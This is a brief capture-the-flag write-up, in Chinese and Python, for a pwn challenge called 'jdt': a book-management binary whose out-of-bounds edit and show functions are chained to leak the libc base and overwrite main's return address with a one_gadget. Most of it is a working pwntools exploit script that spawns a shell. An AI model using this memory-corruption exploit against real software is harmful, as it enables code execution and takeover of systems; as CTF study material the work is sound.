jdt
一个图书管理系统,但并不是常规的堆题。edit和show函数可以越界。edit函数和show函数相互配合泄露libc基地址,将main函数的返回地址覆盖成onegadgets拿shell。
from pwn import * p = process('./pwn') elf = ELF('./pwn') libc = ELF('./libc.so.6') context(os='linux',arch='amd64',log_level='debug') def duan(): gdb.attach(p) pause() def add(price,author,name,description): p.sendlineafter('Choice: ','1') p.sendafter('Price?',str(price)) p.sendafter('Author?',author) p.sendafter('name?',name) p.sendafter('Description?',description) def show(index): p.sendlineafter('Choice: ','3') p.sendlineafter('idx?',str(index)) show(16) p.recvuntil('Author: ') addr = u64(p.recv(6).ljust(8,'\x00')) print 'addr-->'+hex(addr) p.sendlineafter('Choice: ','2') p.sendlineafter('idx?','16') p.sendlineafter('Choice: ','2') p.sendafter('Author?','a'*8) show(16) p.recvuntil('aaaaaaaa') libc_base = u64(p.recv(6).ljust(8,'\x00'))-240-libc.symbols['__libc_start_main'] print 'libc_base-->'+hex(libc_base) og = [0x45226,0x4527a,0xf0364,0xf1207] shell = libc_base+og[0] p.sendlineafter('Choice: ','2') p.sendlineafter('idx?','16') p.sendlineafter('Choice: ','2') p.sendafter('Author?',p64(addr)+p64(shell)) p.sendlineafter('Choice: ','5') p.interactive()